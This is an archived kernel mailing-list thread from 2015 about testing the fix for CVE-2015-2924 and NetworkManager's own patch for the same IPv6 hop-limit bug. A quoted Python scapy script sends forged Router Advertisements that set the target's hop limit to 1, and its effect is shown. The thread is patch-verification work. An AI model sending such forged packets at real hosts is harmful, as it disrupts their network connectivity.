| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 29 Apr 2015 13:13:20 -0500 From: Dan Williams <dcbw@...hat.com> To: "D.S. Ljungmark" <ljungmark@...io.se> Cc: Denys Vlasenko <vda.linux@...glemail.com>, David Miller <davem@...emloft.net>, Linus Torvalds <torvalds@...ux-foundation.org>, Andrew Morton <akpm@...ux-foundation.org>, netdev@...r.kernel.org, Linux Kernel Mailing List <linux-kernel@...r.kernel.org>, Hannes Frederic Sowa <hannes@...essinduktion.org>, Don Howard <dhoward@...hat.com> Subject: Re: [GIT] Networking On Wed, 2015-04-29 at 18:55 +0200, D.S. Ljungmark wrote: > > On 29/04/15 18:50, Dan Williams wrote: > > On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote: > >> On 29/04/15 16:51, Denys Vlasenko wrote: > >>> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@...emloft.net> wrote: > >>>> D.S. Ljungmark (1): > >>>> ipv6: Don't reduce hop limit for an interface > >>> > >>> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a > >>> > >>> I was testing this change and apparently it doesn't close the hole. > >>> > >>> The python script I use to send RAs: > >>>- > >>> #!/usr/bin/env python > >>> import sys > >>> import time > >>> import scapy.all > >>> from scapy.layers.inet6 import * > >>> ip = IPv6() > >>> # ip.dst = 'ff02::1' > >>> ip.dst = sys.argv[1] > >>> icmp = ICMPv6ND_RA() > >>> icmp.chlim = 1 > >>> for x in range(10): > >>> send(ip/icmp) > >>> time.sleep(1) > >>> > >>> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006 > >>> . > >>> Sent 1 packets. > >>> ...<10 times>... > >>> Sent 1 packets. > >>> > >>> After I do this, on the targeted machine I check hop_limits: > >>> > >>> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done > >>> /proc/sys/net/ipv6/conf/all/hop_limit:64 > >>> /proc/sys/net/ipv6/conf/default/hop_limit:64 > >>> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS > >>> /proc/sys/net/ipv6/conf/lo/hop_limit:64 > >>> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64 > >>> > >>> As you see, the interface which received RAs still lowered > >>> its hop_limit to 1. I take it means that the bug is still present > >>> (right? I'm not a network guy...). > >> > >> It might not be present in the _kernel_. Do you run NetworkManager on > >> your system? If so, see below. > >> > >>> > >>> I triple-checked that I do run the kernel with the fix. > >>> Further investigation shows that the code touched by the fix > >>> is not even reached, hop_limit is changed elsewhere. > >>> > >>> I'm willing to test additional patches. > >> > >> NetworkManager had it's own re-implementation of the bug. It got fixed > >> with NetworkManager commit: > >> > >> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f > >> Author: Thomas Haller <thaller@...hat.com> > >> Date: Wed Apr 8 15:54:30 2015 +0200 > >> > >> platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924) > >> > >> > >> > >> Beforte that commit, NetworkManager would take the RA packet, extract > >> the hop limit, and write it to the sysctl itself. > > > > Yup, we basically followed the original kernel logic here, so we needed > > to patch it in NM as well. It's been backported to NM 0.9.10, 1.0, and > > obviously is in git master. > > > > Are there any release announcements for NetworkManager? Or a place to > link for official releases/homepage? The mailing list: https://mail.gnome.org/mailman/listinfo/networkmanager-list The project site: https://wiki.gnome.org/Projects/NetworkManager Dan -- To unsubscribe from this list: send the line "unsubscribe netdev" in the body of a message to majordomo@...r.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Powered by blists - more mailing lists